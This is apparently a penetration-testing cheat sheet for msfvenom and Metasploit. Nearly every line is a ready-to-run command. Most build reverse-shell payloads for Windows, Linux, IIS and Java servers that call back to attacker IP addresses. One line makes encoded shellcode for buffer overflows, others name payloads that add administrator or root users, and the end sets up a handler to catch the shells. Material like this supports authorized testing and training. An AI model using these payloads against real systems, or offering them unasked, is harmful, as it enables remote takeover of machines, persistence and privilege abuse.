List payloads and formats
msfvenom --list payload
msfvenom --list format
Most used payloads
Windows - x86 - exe
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.233 LPORT=21 -f exe -o binary.exe
Windows - x64 - exe
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.119.233 LPORT=21 -f exe -o binary.exe
Windows - x64 - .msi
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.11 LPORT=53 -f msi -o reverse.msi
Windows - .dll
msfvenom -p windows/shell_reverse_tcp -f dll -o shell.dll LHOST=192.168.49.184 LPORT=445
Windows - .hta
sudo msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.138 LPORT=4444 -f hta-psh -o evil.hta
Windows - .asp
Useful when the web server is Microsoft IIS. Also try the extensions .aspx and .aspx-exe.
msfvenom -p windows/shell_reverse_tcp -f asp LHOST=10.10.16.8 LPORT=4444 -o reverse-shell.asp
.war (java/jsp)
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.2 LPORT=80 -f war > shell.war
Linux - x86 - elf
msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.119.151 LPORT=80 -f elf -o shell.elf
Linux - x64 - elf-so
msfvenom -p linux/x64/shell_reverse_tcp -f elf-so -o utils.so LHOST=192.168.130.21 LPORT=80
For buffer overflows
Windows - .c
The -e flag specifies the encoding.
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.49.218 LPORT=80 EXITFUNC=thread -b "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x3d\x3b\x2d\x2c\x2e\x24\x25\x1a" -f c -e x86/alpha_mixed
Other payloads
cmd/windows/adduser # Create a new user and add them to local administration group
linux/x86/adduser # Create a new user with UID 0
windows/adduser # Create a new user and add them to local administration group
Handlers for staged payloads
msfconsole -q
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp # change to match the staged payload that was generated
set LPORT <port>
set LHOST <ip>
exploit -j # run the handler in the background